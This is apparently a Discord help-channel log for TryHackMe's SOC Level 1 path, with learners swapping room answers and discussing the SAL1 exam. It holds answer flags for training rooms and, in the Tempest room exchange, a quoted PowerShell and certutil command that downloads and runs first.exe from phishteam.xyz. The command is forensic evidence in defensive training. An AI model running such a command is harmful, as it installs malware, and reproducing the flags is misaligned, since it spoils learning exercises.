Thank you so much
Gave +1 Rep to @quasi bough (current: #2 - 2894)
Anytime 🙂
@quasi bough what's up man?
What's up 🙂
I am stuck in TheHive project room
I type in the answer, but it says 'wrong answer' in task 5.3 of the room.
What's your answer 🙂 ?
THM{FILES_ARE_OBSERVABLERS}
Try to refresh the page and copy this THM{FILES_ARE_OBSERVABLES}
Thanks mate. It worked.
Gave +1 Rep to @quasi bough (current: #2 - 2937)
@quasi bough hello. Are you available?
Hello 👋 🙂
I need your assistance in Tempest room, task 5.2
What's the problem 🙂 ?
The answer format. It is somewhat misleading.
“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -w hidden -noni certutil -urlcache -split -f ‘http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe
You again have this weird quotes 🙂 . Use us layout quotes
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe
I used us layout quotes, it didn't go through.
You used “ and ‘ instead of " and ' 🙂
The answer format says Remove the double quotes from the log
This didn't go through.
Let's try to remove them then 🙂
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe
Went through. Thanks for your help.
Gave +1 Rep to @quasi bough (current: #2 - 3088)
hi all, I have a question about Zeek. not directly related with soc level 1.
I was trying to figure out how the conn.log file works because I've noticed on some occasions that it seems like certain traffic isn't being logged in conn.log. I tried running some tests, and one of them was performing a ping on my network. Although I see some ICMP entries in conn.log, I don't see any ICMP records from the pings I'm sending. Do you have any idea why this might be happening?
After trying several ways to enter the email address, found the solution: N e t f I i x JGQ47wazXe1xYVBrkeDg-JOg7ODDQwWdR@JOg7ODDQwWdR-yVkCaBkTNp.gogolecloud.com But when you copy&paste, remove the < and >
In Zeek, the conn.log file is designed to log connection-level details like IPs, ports, protocols, start and end times, and the state of the connection. But ICMP can be a bit tricky. Why the ping might not be showing up could be because of no connection for ping: in Zeek's eyes it isn't a connection because it doesn't establish a session like TCP or UDP. It's just a request and a reply, so it might not always log it in conn.log;
Run this cmd to see if your pings show up there: cat /path/to/zeek/logs/current/icmp.log
thank you so much. you give me the hint. I was a little confused with that logging and firstly I thought it was like a packet tracer. I did my tests and everything is as expected 🙂
Gave +1 Rep to @ionic hedge (current: #1319 - 3)
What's the issue 🙂 ?
I will let you know thanks
stuck here with the room phishing analysis phishing case 1, what is the From email address?
smth is wrong w this room, my answer should be right, the new format sucks
pls help
You need to wrap it in <> N e t f I i x <JGQ47wazXe1xYVBrkeDg-JOg7ODDQwWdR@JOg7ODDQwWdR-yVkCaBkTNp.gogolecloud.com>
thanks a lot
Gave +1 Rep to @quasi bough (current: #2 - 3353)
Hiii guys
I just completed the SOC Level 1, how long does it take before I'll see my certificate please?
If you're looking for a career/certification advice try to ask guys in #cyber-and-careers channel 🙂
Thanks KGB, I just completed the SOC LEVEL 1, but I haven't been certified
Also @quasi bough How'd you link your discord with your thm account so I can get my wizard role
Congrats on completing SOC1 🥳 👏 . To link with THM account you will need to verify . You can learn how to do so on the link below 🙂
https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account
Thanks @quasi bough
Will I receive a Certificate?
I'm yet to receive one
Gave +1 Rep to @quasi bough (current: #2 - 3366)
Yes , you will , just make sure to set name correctly because it can't be changed afterwards 🙂
Okay
Anyone did the Redline room?
The VM is so slow, i can't get the audit script to finish. Already tried multiple times but it's stuck at "Ensuring the proper working directory..."
I'm also getting instance terminations after the script is running quite some time.
I was fighting through the WindowsForensics1,2 and the Autopsy rooms lately and they also had this crappy performing VM attached. It was a nightmare.
Even the bloody file explorer takes minutes to load 😄 I'm not exaggerating.
Hi, got the same issue for Windows Forensic, pain in the ass to complete the room,
Do anyone know if it's possible to download the artifacts to perform the analysis on a local machine ?
Hey can you help me with that task. I'm stuck right were you were
What's the problem ?
I can't find an answer to the question in task 6 of intro to malware analysis room. Maybe I'm being dumb. But i cant find the two windows utilities that they are asking for
What is the question 🙂 ?
In the process tree, there are two Windows utilities utilized by the malware to perform its activities. What are the names of the two utilities? (Format: utility1.exe and utility2.exe)
Do you have any answer yet or ?
I tried cmd.exe. but i couldn't find the second one
Plus i dont know if cmd.exe is correct. I have to get both of them to check.
It is correct, look at the process below from the tree which is connected to cmd.exe
Thank you sir... Got it
Gave +1 Rep to @quasi bough (current: #1 - 3541)
told you that i was being dumb. I mistakenly was analysing a different report
It's ok . Happens to everybody 🙂
I was doing the Unattended room yesterday and noticed that Windows Defender is taking up a lot of the CPUs resources.
Try turning real time protection off in the settings. It boosted the performance quite a bit for me.
I’ll try thx for the advice
Gave +1 Rep to @coarse sparrow (current: #1770 - 2)
I am doing the Snort room. It says that you have to run the generate-traffic script, but there seems to be already a lot of traffic on eth0. What I am doing wrong?
You can ignore that.
I just examined the VM and there was a decent amount of traffic coming in on port 80 indeed. I killed the corresponding python3 websocket process and then I immediately lost connection with the machine.
So it should be the connection (VNC or some other remote desktop technology) through which you are interacting with the machine.
Alright, thank you
You don't need to do that , it's just an example , instead you should perform analysis of pre-captured file 🙂
Ok, thanks
Snort room > Task 8: After entering:
sudo snort -c /etc/snort/snort.conf -A full -l . -r mx-1.pcap
It shows: No such file or directory. Please help!
Can you provide a screenshot ?
I am not able to attach anything in this discord, is it just me?
You need to verify your account.
the csv file is not generating
what am i doing wrong
@primal igloo
can you help
<file:///c:/User/user/Desktop/Incident%20Files/sysmon.csv>
in yara room task 9, it asks if the .yar file you created works, but mine doesnt work so thats what i get and it does not allow me to continue with the task
What’s up y’all. What are y’alls thoughts on this room?
Great intro path into blue teaming 🙂
It is really good , after it you can continue with #soc-level-2-path 🙂
Hmmm thanks
Hi all,
I'm looking to refresh and skill up on some SOC Level 1 material. I'm considering purchasing the SAL1 exam, but I'm a bit confused by the description.
If I purchase the SAL1 exam, does it include access to the course content needed to prepare for it? Or is the SOC Level 1 path/track the content that's specifically designed to prepare you for the SAL1 exam?
Thanks in advance for the clarification!
NM, found this in the FAQ:
https://tryhackme.com/certification/security-analyst-level-1/details
^ for those with the same question
when SAL1 made available i purchased it and now it is telling me i am no longer a subscriber and it logged me off my account and does not allow me to "continue with google" anymore is everything ok in the website?
It should be , works ok for me . Try to restart your browser
I did and its doing the same thing, why did i get an email that i am no longer subscribed? i cant even access the account and see what happened
alright i managed to enter manually
im supposed to get 3 free months of premium how do i check if i still have premium?
Yeah , you're getting 3 month premium with SAL1 , your sub will be paused for that amount of time 🙂
thats great but how can i tell if i am still premium or not?
Can you still access premium content ? Go to your profile page it should be displayed there
it seems not, i just got blocked from premium content
i dont understand why i dont have 3 months of premium after the purchase
That's part of SAL1 package as far as I can remember
its going to take me forever to get an answer from the support team now I wont be able to study at all today :/
Which room , you can't access ?
YARA
How ?
it says its a premium room and i cant access it
Hm , strange . It says here that you're a premium user
i know its really odd, i also got an email telling me i no longer subscribed and when i tried to enter THM it was logged off and now i cant access anything premium
I think i know what went wrong though
i had a sub approved just for 1 month
got the SAL1 and didnt renew the old sub
automated system that is supposed to revoke your premium went into action and now its kind of bugged
i sent a ticket to support but it does seem I'll be able to study today
Sorry but I can't help you with account/sub. related issues . You will need to get in touch with support on the email below . However be aware that they don't work on weekends 😦
oh yeah that a weekend over there now damn
thank you for the help, too bad i was motivated to do a bit more today
Sorry but only support can help with sub related problems 😦 . They will reach out to you asap
Hey, does the Learning Path tell us how to correctly submit a case report?
Yeah , it will teach you how to spot true/false positives 🙂
I can spot those, I'd like to see an example case report. It's a crucial part of the exam but other than the 5W's it doesn't appear to teach that part?
For the SLA1 exam portion that is multiple choice, do you get to use the THM learning path material, like SOC 1 path and Cyber 101 path from which the questions are derived? Or do I have to memorize all 4 kill chain models and every MITRE ATT&CK tactic 😂
it is open book so you are allowed to use any resource you have access to to answer
have you got a reference for that?
how do we answer wireshark 101 task 11
Looking at the data stream what is the full request URI from packet 18?
its not accepting the answer. scoured the net and nothing seems to be working. help
What is your answer ?
Hm , looks good
Try to refresh the page and copy this http://pagead2.googlesyndication.com/pagead/ads?client=ca-pub-2309191948673629&random=1084443430285&lmt=1082467020&format=468x60_as&output=html&url=http://www.ethereal.com/download.html&color_bg=FFFFFF&color_text=333333&color_link=000000&color_url=666633&color_border=666633
that worked! thank you so much. i really appreciate it.
Good day. I need some help regarding how to properly answer this question in "Summit" section.
What is the second flag you receive after successfully detecting sample2.exe?
I feel like I'm missing something to get the answer/flag for this question. Can someone guide or assist me with this? Thanks.
What is your answer?
I'm not getting an answer because when I try different methods of obtaining the answer, it's not the right one. For example, you have to upload Sample2.exe and check your results. With those results comes a generic message that is supposed to have malicious intent. Then you have to use the tools to figure out what kind of malicious intent is within the Sample2.exe message. The problem is, I'm not able to figure it out from that point to actually get the flag, which would advance me to the next question.
I could not find an article, please try again.
It's been awhile since I've done that room
Do you still need help, if so which part are you stuck on? Is it solving Sample2.exe?
Yeah, solving Sample2.exe is where I'm stuck at...
Scroll down to see the Network Activity. There should be one IPv4 address that stands out. Take that IP address, and use the Firewall Manager.
I won't directly tell you the answer, but that should give you some guidance hopefully.
Hey Verax1ty, I certainly do appreciate the help with this information you gave me. Thank you very much...I'll try that shortly after I finish reading. Thanks again!
Np
Wanted to do a quick follow-up, were you able to solve Sample2.exe?
TryHackMe, you failed with your fucking shit exam. That's the worst I have ever seen in my life. No SOC, except a SOC which has no idea what they are doing, is working like this. I canceled my subscription and hopefully many others will do this.
Your AI sucks fully.
Remove this exam, sit down and create a better one which is competitive.
Sorry this exam has not been for you. I just read some of your other posts in the other channels.
- It seems you had an issue in the exam and reached support for help, and they didn't respond quickly enough. Fair point; our support team do an amazing job, but we have had a lot of people sitting the exam, especially with the free exam offer, and sometimes responses have slowed down. Generally, if you tell them about an issue you had with the exam, they can offer a free retake. This is the right workflow to go through to get your issue resolved.
- The realism of the SOC Sim part of SAL1 I think is very true to the typical day to day of a SOC L1 role. If you're talking about wider roles in a SOC, like that of an L2, IR, TH etc., then fair enough. However, SAL1 was designed with a SOC L1 role in mind.
- The AI part of the exam is talked about more than it's actually used. It's quite limited, and even then it's used in two parts: once for grading alert reports against specific criteria per alert, and once for a general recommendation to improve. The grading part is quality reviewed by humans and so far has performed very well. The recommendation part I think we can do more tuning on.
Sorry again that you have not enjoyed the exam and it's not for you.
Good evening,
Who can I speak to about reviewing my SAL1 result?
Try to ask in #site-support 🙂
@ivory belfry I think it would be best to formally log a ticket with support for that as we’d need some verification of details. https://help.tryhackme.com/en/articles/8116292-how-to-create-a-ticket
thank you
Hello, I was in the SOC simulator and got stuck once I assigned the ticket to myself and moved to the tools. I used information from the ticket to search. Now what? Is there a room where I can learn the process?
Try to ask in #soc-sim-help channel 🙂
My man KGB always looking out!!! Thank you
No response in that channel